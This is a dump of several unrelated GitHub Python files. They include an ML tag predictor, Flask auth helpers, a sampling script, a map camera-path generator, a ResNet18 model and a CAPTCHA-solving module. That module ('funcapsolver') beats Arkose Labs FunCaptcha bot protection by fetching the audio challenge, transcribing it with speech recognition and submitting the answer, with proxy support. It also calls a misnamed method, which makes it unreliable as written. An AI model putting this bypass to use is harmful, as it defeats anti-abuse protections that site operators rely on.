LIST:\\n{}\".format(adj_s_2._graph))\r\n","repo_name":"Guitar1st/InterviewPreparation","sub_path":"PythonCode/GraphsAlgo/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3726959314","text":"# IMPORTING MODEL\r\nimport joblib\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.preprocessing import MultiLabelBinarizer\r\ndf = pd.read_csv(\"dataset/Tags.csv\")\r\ndf1 = df.dropna()\r\nimport ast\r\ndf1['Tag'] = df1['Tag'].apply(lambda x: ast.literal_eval(x))\r\n\r\ntagPredictorModel = joblib.load('tag_predictor.pkl')\r\ntfidf = TfidfVectorizer (analyzer='word', max_features=10000, ngram_range=(1,3), stop_words='english')\r\nX = tfidf.fit_transform(df1['Body'].values.astype(str))\r\nmultilabel = MultiLabelBinarizer()\r\ny=df1['Tag'] \r\ny=multilabel.fit_transform(y)\r\n\r\ndef getTags(question):\r\n question = tfidf.transform(question)\r\n tags = multilabel.inverse_transform(tagPredictorModel.predict(question))\r\n print(tags)\r\n return tags","repo_name":"kuttypaiyaa-prakash/TagPredict","sub_path":"tag_predictor.py","file_name":"tag_predictor.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33853019932","text":"import datetime\n\nfrom flask import abort, current_app, jsonify, make_response, request, url_for\n\nfrom . import api, exceptions, redirect\n\n\ndef authorize(permission, resource_class=None, resource='', ctx=None):\n if current_app.config.get('TINYAUTH_BYPASS', False):\n return {\n 'Authorized': True,\n }\n\n context = {\n 'SourceIp': request.remote_addr,\n 'RequestDateTime': datetime.datetime.utcnow().isoformat(),\n }\n context.update(ctx or {})\n\n if resource_class:\n resource_arn = api.format_arn(resource_class, resource)\n else:\n resource_arn = api.get_arn_base()\n\n return api.call('authorize-by-token', {\n 'permit': {\n permission: [resource_arn],\n },\n 'headers': request.headers.to_wsgi_list(),\n 'context': context,\n })\n\n\ndef authorize_or_401(permission, resource_class=None, resource='', ctx=None):\n try:\n authorized = authorize(permission, resource_class, resource, ctx)\n except exceptions.AuthorizationFailed:\n abort(make_response(jsonify({'Authorized': False}), 401))\n\n if authorized['Authorized'] is not True:\n abort(make_response(jsonify(authorized), 401))\n\n return authorized\n\n\ndef authorize_or_login(permission, resource_class=None, resource='', ctx=None):\n try:\n authorized = authorize(permission, resource_class, resource, ctx)\n except exceptions.AuthorizationFailed:\n raise redirect.Redirect(url_for('login.login'))\n\n if authorized['Authorized'] is not True:\n raise redirect.Redirect(url_for('login.login'))\n\n return authorized\n\n\ndef authorize_or_raise(permission, resource_class=None, resource='', ctx=None):\n authorized = authorize(permission, resource_class, resource, ctx)\n\n if authorized['Authorized'] is not True:\n raise exceptions.AuthorizationFailed()\n\n return authorized\n","repo_name":"tinyauth/flask_tinyauth","sub_path":"flask_tinyauth/authorize.py","file_name":"authorize.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12827837254","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Bilal Syed Hussain\n\n\"\"\"\nUsage:\n nsample (iterations|time|cpu) \n ( --essence= --models_timeout= --influence_radius= --info= )\n [ --working_dir=
--seed= --output_dir= --mode= --radius_as_percentage= --use_minion= --pre_generate= --generated_dir= --timeout= ]\n nsample json \n\n`time ` is the total time the program can take.\n`json` allows reloading of the state including the seed.\n\nOptions:\n --help Show this screen.\n --influence_radius= Radius for the acceptance function.\n --essence= Essence file.\n --mode= Conjure mode used [default: df].\n --models_timeout= Timeout in seconds.\n --output_dir= Where to put the results.\n --radius_as_percentage= Radius setting as a % [default: false].\n --seed= Random seed to use.\n --working_dir= Where the essence file is [default: .]\n --info= Files that contains the ordering of the variable\n --use_minion= Uses Minion to generate params [default: true]\n --pre_generate= When using minion, genrate all solution once and pick from them [default: false]\n --generated_dir= Directory to place all solutions, specs, which can be reused between runs\n --timeout= Timeout method to use [default: simple]\n\n\n\"\"\"\n\nfrom lib import domains\nfrom lib import instances\nfrom lib import chain_lib\nfrom lib import method\nfrom lib import option_handing\nfrom lib import timeout\n\nfrom collections import namedtuple\nimport logging\nimport random\n\nlogger = logging.getLogger(__name__)\nSettings=namedtuple('Settings', ['seed', 'mode', 'models_timeout', \"essence\", \"working_dir\", \"output_dir\",\n \"limit\", \"influence_radius\", \"radius_as_percentage\", \"use_minion\",\n \"generated_dir\", \"pre_generate\"])\n\n\nclass NSample(method.Method):\n def __init__(self, options, limiter, info):\n super(NSample, self,).__init__(options, limiter, Settings, info)\n self.rejected_series=0\n\n def before_settings(self, options):\n return self.do_timeout_way(self.do_radius_as_percentage(options))\n\n def goodness(self, point):\n\n def avg_quality(rp):\n # TO DO can made more efficient\n influence_points = [ p for p in self.data_points\n if self.shape.is_in_inside(self.settings.influence_radius, rp, p) ]\n\n if (len(influence_points) == 0):\n logger.info(\"no influence_points\")\n return 0.5\n\n logger.info(\"len(influence_points) %s len(data_points) %s \",\n len(influence_points), len(self.data_points))\n\n quailties = [self.get_quailty(p) for p in influence_points]\n logger.info(quailties)\n\n mean = sum(quailties) / len(quailties)\n return mean\n\n # Should base the the influence based on how far the point is\n quailty = avg_quality(point)\n return 1 - quailty\n\n\n def do_iteration(self):\n x = self.random_point()\n\n logger.info(\"made point x %s\", x)\n logger.info(\"X %s\", self.point_pretty(x))\n\n goodness_x = self.goodness(x)\n\n if len(self.data_points) > 1:\n goodness_x_prev = 1 - self.get_quailty(self.data_points[-1])\n logger.info(\"Using previous data point\")\n else:\n goodness_x_prev = 1\n logger.info(\"No previous data point\")\n\n logger.info(\"point: goodness_x: %0.3f goodness_x_prev: %0.3f pretty %s\", goodness_x, goodness_x_prev, [y.pretty for y in x ])\n\n\n def accept_point():\n if goodness_x_prev == 0:\n logger.info(\"Unconditionally accepting since goodness_x_prev is 0\")\n return True\n\n accept = goodness_x / goodness_x_prev\n if accept >= 1:\n logger.info(\"Unconditionally accepting %0.3f\", accept)\n return True\n elif self.rejected_series > 10000:\n # To account the radius being too large and influence points saying everything is useless\n logger.warn(\"Rejected 10000 points in a rows, accepting with 50% Probability\")\n return random.choice([True,False])\n else:\n u = random.uniform(0, 1)\n logger.info(\"accept:%0.3f, u:%0.3f, u\")\n\n","repo_name":"Bilalh/Gen","sub_path":"etc/unused_code/mchain/nsampling.py","file_name":"nsampling.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21293235043","text":"#=============================================================================#\r\n# Create Cameras Path 24.05.2019 #\r\n#-----------------------------------------------------------------------------#\r\n# #\r\n# Michael Zwick | Topografischer Fachspezialist | VBS / swisstopo #\r\n# #\r\n#=============================================================================#\r\n\r\nimport os\r\nimport ast\r\nimport math\r\nimport time\r\nimport pickle\r\nimport datetime\r\nimport requests\r\n\r\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\nprint(timestamp + ' |START| Create Cameras Path')\r\n\r\n\r\n\r\n\r\n# Script parameters\r\nkml = 'line.kml' # None | KML file example: geoadmin.kml\r\npath2D = None # None | list example: [[2600334, 1199351],[2600276, 1199419]] # Marzilibahn\r\nelevation = 700 # None | height\r\npitch = -20 # degree\r\nstep = 2 # meter\r\niteration = 3\r\n\r\ndef string2list(string):\r\n listNew = []\r\n stringNew = string.split('[[')[1].split(']]')[0].split('],[')\r\n for i in range(0,len(stringNew)):\r\n e = float(stringNew[i].split(',')[0])\r\n n = float(stringNew[i].split(',')[1])\r\n listNew.append([e, n])\r\n return listNew\r\n\r\ndef wgs84tolv95(coordWGS84):\r\n url = \"http://geodesy.geo.admin.ch/reframe/wgs84tolv95\"\r\n parameter = {\"easting\": coordWGS84[0],\r\n \"northing\": coordWGS84[1],\r\n \"format\": \"json\"}\r\n response = requests.get(url=url, params=parameter)\r\n result = response.json()\r\n eLV95 = float(result[\"easting\"])\r\n nLV95 = float(result[\"northing\"])\r\n return [eLV95, nLV95]\r\n\r\ndef lv95towgs84(coordLV95):\r\n url = \"http://geodesy.geo.admin.ch/reframe/lv95towgs84\"\r\n parameter = {\"easting\": coordLV95[0],\r\n \"northing\": coordLV95[1],\r\n \"format\": \"json\"}\r\n response = requests.get(url=url, params=parameter)\r\n result = response.json()\r\n eWGS84 = float(result[\"easting\"])\r\n nWGS84 = float(result[\"northing\"])\r\n return [eWGS84, nWGS84]\r\n\r\ndef getDist(point1, point2):\r\n dist = math.sqrt((point2[0]-point1[0])**2 + (point2[1]-point1[1])**2)\r\n return dist\r\n\r\ndef getAzi(point1, point2):\r\n azi = math.atan2((point2[0]-point1[0]), (point2[1]-point1[1]))\r\n return azi\r\n\r\ndef calcPolar(point, azi, dist):\r\n point2 = [point[0] + dist * math.sin(azi), point[1] + dist * math.cos(azi)] \r\n return point2\r\n\r\ndef list2linekml(coordList, CRS):\r\n f = open('path.kml', 'w')\r\n f.write('')\r\n if CRS == 'WGS84':\r\n for i in range(0,len(coordList)):\r\n f.write(str(coordList[i][0]) + ',' + str(coordList[i][1]) + ' ')\r\n elif CRS == 'LV95':\r\n for i in range(0,len(coordList)):\r\n WGS84 = lv95towgs84([coordList[i][0], coordList[i][1]])\r\n f.write(str(WGS84[0]) + ',' + str(WGS84[1]) + ' ')\r\n else:\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |ERROR| No valid CRS is given')\r\n exit()\r\n f.write('')\r\n f.close()\r\n\r\ndef list2pointskml(coordList, CRS):\r\n f = open('points.kml', 'w')\r\n f.write('')\r\n if CRS == 'WGS84':\r\n for i in range(0,len(coordList)):\r\n f.write('')\r\n f.write(str(coordList[i][0]) + ',' + str(coordList[i][1]))\r\n f.write('')\r\n elif CRS == 'LV95':\r\n for i in range(0,len(coordList)):\r\n f.write('')\r\n WGS84 = lv95towgs84([coordList[i][0], coordList[i][1]])\r\n f.write(str(WGS84[0]) + ',' + str(WGS84[1]))\r\n f.write('')\r\n else:\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |ERROR| No valid CRS is given')\r\n exit()\r\n f.write('')\r\n f.close()\r\n\r\ndef path2curve(path2D):\r\n path2Dnew = []\r\n path2Dnew.append(path2D[0])\r\n for i in range(1,len(path2D)-1):\r\n p1 = path2D[i-1]\r\n p2 = path2D[i]\r\n p3 = path2D[i+1]\r\n d1 = getDist(p1,p2)\r\n d2 = getDist(p2,p3)\r\n a1 = getAzi(p2,p1)\r\n a2 = getAzi(p2,p3)\r\n if d1 <= d2:\r\n d = d1\r\n else:\r\n d = d2\r\n path2Dnew.append(calcPolar(p2,a1,d/4.0))\r\n path2Dnew.append(calcPolar(p2,a2,d/4.0))\r\n path2Dnew.append(path2D[-1])\r\n return path2Dnew\r\n\r\ndef dirInterpol(headings):\r\n headingLast = None\r\n headingGroup = []\r\n headingAmount = []\r\n for heading in headings:\r\n if headingLast != heading:\r\n headingLast = heading\r\n headingGroup.append(heading)\r\n count = 1\r\n headingAmount.append(count)\r\n else:\r\n count += 1\r\n headingAmount[-1] = count\r\n\r\n for i in range(0, len(headingGroup)):\r\n if i > 0:\r\n l1 = headingGroup[i-1]\r\n l2 = headingGroup[i]\r\n if abs(l1-l2) > 180:\r\n if l1 < l2:\r\n headingGroup[i] = l2-360\r\n elif l1 < l2:\r\n headingGroup[i] = l2+360\r\n \r\n headings = []\r\n lenInterpolLast = 0\r\n for i in range(0, len(headingGroup)):\r\n if i < len(headingGroup)-1:\r\n l1 = headingAmount[i]\r\n l2 = headingAmount[i+1]\r\n if l1 <= l2:\r\n lenInterpol = int(l1/2)\r\n else:\r\n lenInterpol = int(l2/2)\r\n if lenInterpol != 0:\r\n stepInterpol = (headingGroup[i+1]-headingGroup[i])/(lenInterpol*2+1)\r\n else:\r\n stepInterpol = 0\r\n for j in range (lenInterpolLast, headingAmount[i]-lenInterpol):\r\n headings.append(headingGroup[i])\r\n for k in range (0, lenInterpol * 2):\r\n headings.append(headingGroup[i] + (k+1) * stepInterpol)\r\n lenInterpolLast = lenInterpol\r\n else:\r\n for l in range (0, headingAmount[i]-lenInterpol):\r\n headings.append(headingGroup[-1])\r\n return headings\r\n\r\n\r\n\r\n\r\n# Loading path\r\nif kml != None:\r\n with open(kml, 'r') as fp:\r\n fileLine = fp.readline()\r\n if fileLine.find(''):\r\n try:\r\n coordinates = fileLine.split('')[1].split('')[0]\r\n except:\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |ERROR| Wrong KML. Digitize on www.map.geo.admin.ch.')\r\n path2D = []\r\n for p in coordinates.split(' '):\r\n c = p.split(',')\r\n path2D.append(wgs84tolv95([float(c[0]),float(c[1])]))\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |INFO | KML interpreted')\r\nelse:\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |INFO | Path2D interpreted')\r\n\r\n\r\n\r\n\r\n# Smoothing path\r\nfor i in range(0,iteration):\r\n path2D = path2curve(path2D)\r\nlist2linekml(path2D, 'LV95')\r\n\r\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\nprint(timestamp + ' |INFO | Smoothing path done')\r\n\r\n\r\n\r\n\r\n# Calculating camera positions in WGS84\r\npositions = []\r\nheadings = []\r\nelevations = []\r\npitches = []\r\nmode = 'Path'\r\n\r\noffset = 0\r\nfor i in range (0, len(path2D)-1):\r\n dist = offset\r\n eStart = path2D[i][0]\r\n nStart = path2D[i][1]\r\n eEnd = path2D[i+1][0]\r\n nEnd = path2D[i+1][1]\r\n azimut = math.atan2((eEnd - eStart), (nEnd - nStart))\r\n distTotal = math.sqrt((eEnd - eStart)**2 + (nEnd - nStart)**2)\r\n\r\n while dist < distTotal:\r\n eLV95 = eStart + dist * math.sin(azimut)\r\n nLV95 = nStart + dist * math.cos(azimut)\r\n dist += step\r\n position = lv95towgs84([eLV95, nLV95])\r\n heading = azimut / math.pi * 180\r\n if elevation != None:\r\n elevations.append(elevation)\r\n else:\r\n if elevToTerrain != None:\r\n elevations.append(coord2height([eLV95, nLV95]) + elevToTerrain)\r\n\r\n positions.append(position)\r\n if heading < 0:\r\n headings.append(heading+360.0)\r\n else:\r\n headings.append(heading)\r\n pitches.append(pitch)\r\n\r\n offset = dist - distTotal\r\n\r\nheadings = dirInterpol(headings)\r\nlist2pointskml(positions, 'WGS84')\r\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\nprint(timestamp + ' |INFO | Calculating ' + str(len(headings)) + ' camera positions done')\r\n\r\n\r\n\r\n\r\n# Save the camera parameters in a file\r\nfile = open('cameras.pkl', 'wb')\r\npickle.dump(positions, file)\r\npickle.dump(headings, file)\r\npickle.dump(elevations, file)\r\npickle.dump(pitches, file)\r\npickle.dump(mode, file)\r\nfile.close()\r\n\r\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\nprint(timestamp + ' |END | Create Cameras Path')\r\n","repo_name":"michaelzwick/MapGeoAdmin_Video","sub_path":"CreateCameras_Path.py","file_name":"CreateCameras_Path.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"30348727296","text":"import tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom src.tf.models.resnet import ResNetMulticlassClassifier\nfrom tensorflow.keras.layers import Conv2D, BatchNormalization, Activation, Input, \\\n AveragePooling2D, Flatten, ZeroPadding2D, Add, MaxPool2D, Dense, Dropout\n\n\n\"\"\"\nThe customized ResNet implementation found in the demo:\nhttps://www.analyticsvidhya.com/blog/2021/08/how-to-code-your-resnet-from-scratch-in-tensorflow/\n\"\"\"\nclass ResNet18(ResNetMulticlassClassifier):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n def get_identity_block(self, x, filter, kernel=(3, 3)):\n x2 = Conv2D(filter, kernel, padding=\"same\")(x)\n x2 = BatchNormalization(axis=3)(x2)\n x2 = Activation(\"relu\")(x2)\n x2 = Conv2D(filter, kernel, padding=\"same\")(x2)\n x2 = BatchNormalization(axis=3)(x2)\n x3 = Add()([x2, x])\n x3 = Activation(\"relu\")(x3)\n\n return x3\n\n\n def get_conv_block(self, x, filter, kernel=(3, 3), strides=(2, 2)):\n x2 = Conv2D(filter, kernel, padding=\"same\", strides=strides)(x)\n x2 = BatchNormalization(axis=3)(x2)\n x2 = Activation(\"relu\")(x2)\n x2 = Conv2D(filter, kernel, padding=\"same\")(x2)\n x2 = BatchNormalization(axis=3)(x2)\n x3 = Conv2D(filter, (1, 1), strides=strides)(x)\n x4 = Add()([x2, x3])\n x4 = Activation(\"relu\")(x4)\n\n return x4\n\n\n def build(self):\n input = Input(self.input_shape)\n x = ZeroPadding2D((3, 3))(input)\n x = Conv2D(64, 7, strides=2, padding=\"same\")(x)\n x = BatchNormalization()(x)\n x = Activation(\"relu\")(x)\n x = MaxPool2D(3, strides=2, padding=\"same\")(x)\n block_layers = [3, 6]\n filter_size = 64\n\n for i in range(2):\n if i == 0:\n for j in range(block_layers[i]):\n x = self.get_identity_block(x, filter=filter_size)\n else:\n filter_size = filter_size * 2\n x = self.get_conv_block(x, filter=filter_size)\n for j in range(block_layers[i] - 1):\n x = self.get_identity_block(x, filter=filter_size)\n\n x = AveragePooling2D(pool_size=(2, 2), padding=\"same\")(x)\n x = Flatten(name=\"flatten\")(x)\n x = Dense(512, activation=\"relu\")(x)\n x = Dropout(0.2)(x)\n x = Dense(self.classes_num, activation=\"softmax\")(x)\n self.model = Model(inputs=input, outputs=x, name='Resnet18')\n self.model.summary()\n\n\nif __name__ == \"__main__\":\n resnet = ResNet18(classes_num=2)\n resnet.build()\n resnet.train(images_dir=r\"D:\\op\\datasets\\v5_structured\")","repo_name":"unicef/Sudan-school-mapping-AI_models","sub_path":"src/tf/models/resnet18.py","file_name":"resnet18.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"42100893383","text":"from . import ot_nym\nfrom flask import Blueprint, jsonify, request\n\nmod_nym = Blueprint('nym', __name__, template_folder='templates')\n\n\n@mod_nym.route('/nyms', methods=['GET'])\ndef nym_get_all():\n nyms = ot_nym.get_all()\n\n return jsonify(nyms), 200\n\n\n@mod_nym.route('/nyms/', methods=['GET'])\ndef nym_get_info(id):\n nym = ot_nym.get_nym_info(id)\n\n return jsonify(nym), 200\n\n\n@mod_nym.route('/nyms', methods=['POST'])\ndef nym_post():\n nym = ot_nym.create()\n\n if 'error' in nym:\n return jsonify(nym), 500\n\n if 'name' in request.json:\n result = ot_nym.set_name(nym['nym'], request.json['name'])\n\n statusCode = 500 if 'error' in result else 200\n\n return jsonify(result), statusCode\n\n return jsonify(nym), 200\n\n\n@mod_nym.route('/nym//register/', methods=['POST'])\ndef nym_register(nym, server):\n result = ot_nym.register(nym, server)\n\n statusCode = 500 if 'error' in result else 200\n\n return jsonify(result), statusCode\n\n\n@mod_nym.route('/nyms//name/', methods=['POST'])\ndef nym_name_post(nym, name):\n result = ot_nym.set_name(nym, name)\n\n statusCode = 500 if 'error' in result else 200\n\n return jsonify(result), statusCode\n\n\n@mod_nym.route('/nyms/count', methods=['GET'])\ndef nym_count():\n count = ot_nym.count()\n\n statusCode = 500 if 'error' in count else 200\n\n return jsonify(count), statusCode\n\n\n@mod_nym.route('/nyms//outgoing/', methods=['GET'])\ndef nym_outgoing(id, serverId):\n outgoing = ot_nym.outgoing(id)\n\n statusCode = 400 if 'error' in outgoing else 200\n\n return jsonify(outgoing), statusCode\n\n\n@mod_nym.route('/nyms//incoming/', methods=['GET'])\ndef nym_incoming(id, serverId):\n incoming = ot_nym.incoming(id, serverId)\n\n statusCode = 400 if 'error' in incoming else 200\n\n return jsonify(incoming), statusCode","repo_name":"klzns/opentracks","sub_path":"app/resources/nym/api_nym.py","file_name":"api_nym.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"4678334371","text":"import speech_recognition as sr\nimport requests\nimport random\nimport string \nimport time\nimport os\n\nclass funcapsolver():\n\tdef get_token(host, pkey, proxy=None):\n\t\tif proxy == None:\n\t\t\treturn requests.post(f'https://client-api.arkoselabs.com/fc/gt2/public_key/{pkey}', data={'bda': '','public_key': pkey,'site': host,'userbrowser': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36','rnd': f'0.{random.choice(\"12334565789\")}'}).json()['token']\n\t\telse:\n\t\t\treturn requests.post(f'https://client-api.arkoselabs.com/fc/gt2/public_key/{pkey}', proxies={'all://': proxy}, data={'bda': '','public_key': pkey,'site': host,'userbrowser': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36','rnd': f'0.{random.choice(\"12334565789\")}'}).json()['token']\n\n\tdef recognizeAudio(audiofilename):\n\t\trecognize = sr.Recognizer()\n\t\twith sr.AudioFile(audiofilename + '.wav') as s:\n\t\t\tdata = recognize.record(s)\n\t\t\traw = recognize.recognize_google(data)\n\t\t\tanswer = ''\n\t\t\tfor char in raw:\n\t\t\t\tif char.isdigit():\n\t\t\t\t\tanswer += char\n\t\t\treturn answer\n\n\tdef solveCaptcha(token, proxy=None):\n\t\tsession_token = token.split('|')[0]\n\t\tif proxy == None:\n\t\t\tgetcaptchaAudio = requests.get(f'https://client-api.arkoselabs.com/fc/get_audio/?session_token={session_token}&analytics_tier=40&r=us-east-1&game=1&language=en')\n\t\telse:\n\t\t\tgetcaptchaAudio = requests.get(f'https://client-api.arkoselabs.com/fc/get_audio/?session_token={session_token}&analytics_tier=40&r=us-east-1&game=1&language=en', proxies={\"all://\": proxy})\n\t\taudiornd = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 7)) \n\t\topen(rf\"{os.getcwd()}\\audios\\{audiornd}\" + '.wav', 'wb+').write(getcaptchaAudio.content)\n\n\t\tattemptSolve = requests.post('https://client-api.arkoselabs.com/fc/audio/', proxies=proxy,\n\t\theaders = {\n\t\t\t'authority': 'client-api.arkoselabs.com',\n\t\t\t'accept': '*/*',\n\t\t\t'cache-control': 'no-cache',\n\t\t\t'x-newrelic-timestamp': str(round(time.time())),\n\t\t\t'x-requested-with': 'XMLHttpRequest',\n\t\t\t'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',\n\t\t\t'content-type': 'application/x-www-form-urlencoded',\n\t\t\t'origin': 'https://client-api.arkoselabs.com',\n\t\t\t'sec-fetch-site': 'same-origin',\n\t\t\t'sec-fetch-mode': 'cors',\n\t\t\t'sec-fetch-dest': 'empty',\n\t\t\t'accept-language': 'en-US,en;q=0.9'\n\t\t},\n\t\tdata = {\n\t\t\t'session_token': session_token,\n\t\t\t'language': 'en',\n\t\t\t'r': 'us-east-1',\n\t\t\t'audio_type': '2',\n\t\t\t'response': funcapsolver.recognize(rf\"{os.getcwd()}\\audios\\{audiornd}\"),\n\t\t\t'analytics_tier': '40'\n\t\t})\n\t\ttry:\n\t\t\tif attemptSolve.json()['response'] == 'correct':\n\t\t\t\treturn attemptSolve.json()\n\t\t\telif attemptSolve.json()['response'] != 'correct':\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\treturn False\n\t\texcept KeyError as key:\n\t\t\treturn key, False\n","repo_name":"acierp/funcapsolver","sub_path":"funcapsolver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"10134700776","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files\n\"\"\"\nimport csv\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\"\"\"\nTASK 2: Which telephone number spent the longest time on the phone\nduring the period? Don't forget that time spent answering a call is\nalso time spent on the phone.\nPrint a message:\n\" spent the longest time, seconds, on the phone during \nSeptember 2016.\".\n\"\"\"\n\n# Dictionary with the time spent on the phone for each number.\ntime_spent_phone = {}\n\nfor call in calls:\n caller, receiver, start_time, duration = call\n # Save the time spent on the phone for the caller and the receiver\n time_spent_phone[caller] = time_spent_phone.get(caller, 0) + int(duration)\n time_spent_phone[receiver] = time_spent_phone.get(receiver, 0) + int(duration)\n\n# Get the key for the maximum value on time_spent_phone\nphone_longest_time = max(time_spent_phone, key = time_spent_phone.get)\n\nmessage = \"{} spent the longest time, {} seconds, on the phone during September 2016.\"\nprint(message.format(phone_longest_time, time_spent_phone[phone_longest_time]))\n","repo_name":"Serafabr/udacity-data_structure_and_algorithms","sub_path":"projects/project 01 - unscramble computer science problems/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27377251080","text":"def kruskal(g):\n # (w,u,v) \n # -- w -weight of edge\n # -- u - vertex already visited\n # -- v - vertex going to\n edges = sorted([(w,u,v) for u in range(len(g)) for (v,w) in g[u]])\n sets = [{v} for v in range(len(g))]\n # for every v, v in s[v]\n s = list(range(len(g)))\n\n mst = []\n\n for (w,u,v) in edges:\n if u not in set[s[v]]:\n sets[s[u]] |= sets[s[v]]\n for x in sets[s[v]]:\n s[x] = s[u]\n mst.append((u,v))\n return mst","repo_name":"theorowlett/CS350","sub_path":"Lecture 13/kruskals.py","file_name":"kruskals.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41385721913","text":"import subprocess as sp\nimport time\nimport sys\n\nif len(sys.argv) != 3:\n print(\"USAGE : python test.py from to\")\n sys.exit(1)\nfrom_ = int(sys.argv[1])\nto_ = int(sys.argv[2])\n\nsp.run([\"rm\",\"/home/slahmer/cblass/cblas/CBLAS/examples/test_.c\"])\n\n\nfor i in range(from_,to_+1):\n proc1 = sp.run([\"./_test.sh\",\"{}\".format(i)])\n if proc1.returncode != 0:\n print(\"test {} failed\".format(i))\n continue\n time.sleep(1)\n proc2 = sp.run([\"./_validate.sh\",\"{}\".format(i)])\n if proc2.returncode == 0:\n print(\"test {} passed\".format(i))\n else :\n print(\"test {} failed\".format(i))\n sp.run([\"rm\",\"/home/slahmer/cblass/cblas/CBLAS/examples/test_.c\"])\n sp.run([\"rm\",\"/tmp/first{}.log\".format(i)])\n sp.run([\"rm\",\"/tmp/second{}.log\".format(i)])\n","repo_name":"slahmer97/BLASter","sub_path":"test_sources/global_tests/test_with_optimization/my_test.py","file_name":"my_test.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34950526436","text":"import numpy as np\nimport pandas as pd\n\n\ndef prepare_data(start_year, end_year, pct_train):\n years = np.arange(start_year, end_year + 1)\n time = years - 1900\n d = 100 * (2.4) ** time + np.random.normal(0, 1, len(time))\n d_0 = np.array([100] * len(time))\n\n log_d = np.log(d)\n\n train_size = int(pct_train * len(time))\n train_time = time[:train_size]\n test_time = time[train_size:]\n train_log_d = log_d[:train_size]\n test_log_d = log_d[train_size:]\n\n return train_time, test_time, train_log_d, test_log_d\n","repo_name":"ashwin-2309/ml-lab","sub_path":"assignment 3 dorona/final code/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32943896773","text":"\"\"\"信息解析。\r\n\r\n1. 解析标题的 type,如果不符合就报错。\r\n2. 提取 name、module_name、pypi_name,如果不符合就报错。\r\n3. pypi_name 在 pip 网站中检查,不存在则报错。\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nimport os\r\nimport re\r\nfrom typing import Any\r\n\r\nfrom utils import PyPi, set_action_outputs\r\n\r\n\r\ndef parse_title(title: str) -> dict[str, Any]:\r\n \"\"\"解析标题。\"\"\"\r\n pattern = r\"\\[(plugin|adapter|bot)\\]:\\s*(.+)\"\r\n match = re.match(pattern, title)\r\n if match:\r\n return {\"type\": match.group(1), \"name\": match.group(2)}\r\n msg = \"标题格式错误\"\r\n raise ValueError(msg)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n title = os.environ[\"TITLE\"]\r\n pypi_name = os.environ[\"PYPI_NAME\"]\r\n try:\r\n PyPi(pypi_name).check_pypi()\r\n parsed = parse_title(title)\r\n set_action_outputs(\r\n {\r\n \"result\": \"success\",\r\n \"output\": \"\",\r\n \"type\": parsed.get(\"type\", \"\"),\r\n \"name\": parsed.get(\"name\", \"\"),\r\n }\r\n )\r\n except ValueError as e:\r\n set_action_outputs({\"result\": \"error\", \"output\": 